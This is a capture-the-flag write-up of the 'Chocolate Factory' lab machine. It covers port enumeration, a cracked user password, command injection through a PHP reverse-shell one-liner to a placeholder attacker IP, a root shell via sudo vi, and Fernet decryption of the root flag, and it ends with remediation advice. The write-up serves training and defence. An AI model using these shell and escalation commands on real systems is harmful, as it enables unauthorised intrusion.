Target IP: chocolate.thm (Requires /etc/hosts entry) Difficulty: Medium Objective: User (user.txt) & Root (root.txt - Decrypted)

1. Executive Summary

“Chocolate Factory” is a themed Linux machine. Initial Enumeration reveals a large range of ports providing ASCII art hints, leading us to a specific key file. Access is gained by leaking credentials via a vulnerable file download or FTP, followed by command execution on a web panel. Privilege escalation exploits a misconfigured Sudo permission on vi. The final root flag is encrypted, requiring a custom Python script and a previously discovered key to decrypt.

Key TTPs (MITRE ATT&CK):

  • T1078 (Valid Accounts): Cracking credentials (charlie).
  • T1059 (Command and Scripting Interpreter): PHP Remote Code Execution.
  • T1548 (Abuse Elevation Control Mechanism): Exploiting Sudo on vi (GTFOBins).
  • T1027 (Obfuscated Files or Information): Decrypting Fernet tokens.

2. Operational Setup

Host Configuration

echo "10.10.x.x chocolate.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

The Nmap scan reveals a “Chocolate Room” behavior on ports 100-125.

  • Ports 100-125: Provide ASCII art and a hint: “Look somewhere else, its not here!”
  • Port 113 (Ident): Provides a specific URL path: http://localhost/key_rev_key.

B. File Gathering (FTP & Web)

  1. FTP (Port 21): Anonymous login allowed.
  • Downloaded: An image and a base64 encoded file.
  1. Web (Port 80):
  • We download the key mentioned in the hint: wget http://chocolate.thm/key_rev_key.
  • Analysis: This key (-VkgXh...) looks like a Fernet key (Base64url encoded 32-bytes). We save this for later.

C. Credential Discovery

You successfully retrieved /etc/passwd (likely via the web application).

  • Hash Found: Inside /etc/shadow or leaked files, a hash for user charlie was found.
  • Cracked: john --wordlist=rockyou.txt hash -> cn7824.

4. Initial Access: The Command Panel

A. Web Login

We navigate to http://chocolate.thm/home.php (or index) and login.

  • User: charlie
  • Password: cn7824

B. Remote Code Execution (RCE)

The dashboard has a “Command” input field. This is vulnerable to direct command injection.

Payload: We use a PHP one-liner because the web server processes it directly.

php -r '$sock=fsockopen("10.10.YOUR.IP",4444);system("sh <&3 >&3 2>&3");'

Result: Reverse shell caught on listener (nc -lvnp 4444). User Flag: /home/charlie/user.txt.

C. Stabilization (The “Teleport” File)

Inside /home/charlie, there is a file named teleport. In this box, teleport is actually an SSH Private Key.

  • Action: Copy content of teleport to local machine -> id_rsa.
  • Permissions: chmod 600 id_rsa.
  • Login: ssh -i id_rsa charlie@chocolate.thm.

5. Privilege Escalation: Sudo VI

Enumeration

We check sudo rights.

sudo -l
# (root) NOPASSWD: /usr/bin/vi

Exploitation (GTFOBins)

vi allows command execution. If run as sudo, we can spawn a root shell.

sudo vi -c ':!/bin/sh' /dev/null
  • -c: Execute command on startup.
  • :!/bin/sh: Escape to shell.

Status: Root access.


6. The Final Challenge: Decryption

We attempt to read the root flag.

cat /root/root.txt
# Output: gAAAAABfdb52... (Encrypted String)

Wait, there is also a python script root.py hinting at Fernet encryption.

The Decryption Script

We combine the Key we found on Port 113 with the Ciphertext from root.txt.

Your script correctly identifies the algorithm (Fernet) and handles potential URL-decoding issues. Here is the simplified logic:

from cryptography.fernet import Fernet
 
# 1. The Key from Port 113
key = b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
 
# 2. The Flag from /root/root.txt
token = b'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR--bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'
 
try:
    f = Fernet(key)
    print(f.decrypt(token).decode())
except Exception as e:
    print(f"Error: {e}")

Root Flag: (The output of the script).


7. Remediation (Blue Team)

  1. Sudo Configuration: Never allow vi, vim, nano, or less to run with NOPASSWD via sudo. They all have shell escape features.
  2. Web Input Sanitization: The “Command” panel on the web dashboard takes raw input and passes it to system() or exec(). This is a critical vulnerability; use specific API calls instead of shell commands.
  3. Port Hardening: Ports 100-125 should not be open. They leak information (ASCII art) and increase the attack surface.
  4. Sensitive Data: The encryption key (key_rev_key) was hosted on a public web directory. Keys should be stored in secure vaults or environment variables, never in web roots.